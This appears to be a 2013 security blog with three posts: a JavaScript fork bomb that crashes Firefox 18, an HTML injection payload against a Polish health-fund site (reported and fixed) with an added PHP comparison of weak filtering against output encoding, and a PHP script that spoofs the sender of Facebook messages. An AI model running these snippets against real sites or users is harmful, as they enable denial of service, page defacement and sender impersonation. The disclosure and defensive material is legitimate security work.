Wednesday, January 9, 2013

Firefox 18 with new IonMonkey JIT has landed, but...

Yesterday Mozilla released Firefox 18. The main improvement is a new JIT compiler called IonMonkey (you can find the release notes here).

Sadly, Firefox 18 is still vulnerable to a simple JavaScript fork bomb, which results in a denial of service:

function x() {
  for(var r=0; r<100000; r++) {
    var e=setInterval("x()", 1);
  }
}

var d=setInterval("x()", 1);

Live test "here".

PS 1. The new Firefox also contains an integrated PDF viewer called PDF.js. An interesting fact is that it is written entirely in JavaScript. The project is available on GitHub.

PS 2. Firefox 10 was released on January 31, 2012, so this is the 9th Firefox version since then. The software development philosophy responsible for such rapid releases is called "Release early, release often".

Friday, January 4, 2013

HTML code injection on the NFZ website

Insufficient filtering of the slowo parameter in the new/tagi.php script (only the phrase script is removed) means that by manipulating this parameter we can insert arbitrary HTML code.

For example, injecting this HTML code:
<span style="position:absolute;left:150px;top:45px;">
  <img src="http://bit.ly/Uoyc3d" width=50 />
</span>

gives this result:


Test it yourself

The bug has been reported, and the choice of image in the example is entirely random :)

Update 07-01-2013: The bug has been fixed.
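
Added example (not the site's code): the weak filter next to context-appropriate output encoding, run over the markup from this post. The post only says that the phrase script was removed, so `weak_filter()` is an assumed reconstruction, and the function names and the benign sample value are made up for illustration.

```php
<?php
// Assumed reconstruction of the weak filter: the post says only that the
// phrase "script" was removed from the "slowo" parameter.
function weak_filter(string $slowo): string
{
    return str_ireplace('script', '', $slowo);
}

// Hardened form: encode for the HTML context at output time instead of
// trying to delete dangerous words from the input.
function encode_for_html(string $slowo): string
{
    return htmlspecialchars($slowo, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The markup from the post. It never contains the word "script", so a
// filter that deletes that word passes it through unchanged.
$payload = '<span style="position:absolute;left:150px;top:45px;">'
         . '<img src="http://bit.ly/Uoyc3d" width=50 /></span>';

$samples = [
    'markup from the post' => $payload,
    'plain search term'    => 'ubezpieczenie zdrowotne', // constructed benign input
];

foreach ($samples as $label => $value) {
    $weak = weak_filter($value);
    $safe = encode_for_html($value);

    // If angle brackets survive, the browser will still parse the value as tags.
    $stillMarkup = strpbrk($weak, '<>') !== false ? 'yes' : 'no';

    printf(
        "%s\n  after weak filter: %s\n  parsed as markup : %s\n  after encoding   : %s\n\n",
        $label,
        $weak,
        $stillMarkup,
        $safe
    );
}
```

The encoded output turns `<`, `>` and quotes into entities, so the browser renders the value as text; the benign search term is unchanged by either function.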

Thursday, January 3, 2013

Facebook: sending messages to strangers (non-friends) for free and/or spoofing the sender

Facebook is testing paid messages to strangers. How much would you pay to contact a stranger? Well, actually you can do it for free. In case you don't know, when you have a Facebook account you already have an email address in the Facebook domain. You can simply send an email to a particular address, and the message will appear in the Facebook inbox. However, depending on the settings in "Who can contact me", the receiver will or will not be notified, and the message will be put in the "Inbox" or the "Other" mailbox. By default it is set to "Basic Filtering", which means that you will be notified (the "paid option" just ignores those settings, so the receiver will always be notified and you have a guarantee that your message will be put in the "Inbox").

This is already a well-known issue, known as Facebook message spoofing. Why? Because we can spoof the mail header in an old-school way :) For example, this simple PHP script will do the job:
$to = 'facebookID@facebook.com';
$senderAddress = 'email@address.tld';
$subject = 'Some subject';
$message = 'Some message';

$header = "From: $senderAddress\nReply-To: $senderAddress";
$mail = mail($to, $subject, $message, $header);
This short video demonstrates the above script in action:

PS. And yes, Facebook filters and rejects mail from the facebook.com domain. If it didn't, it would be devastating.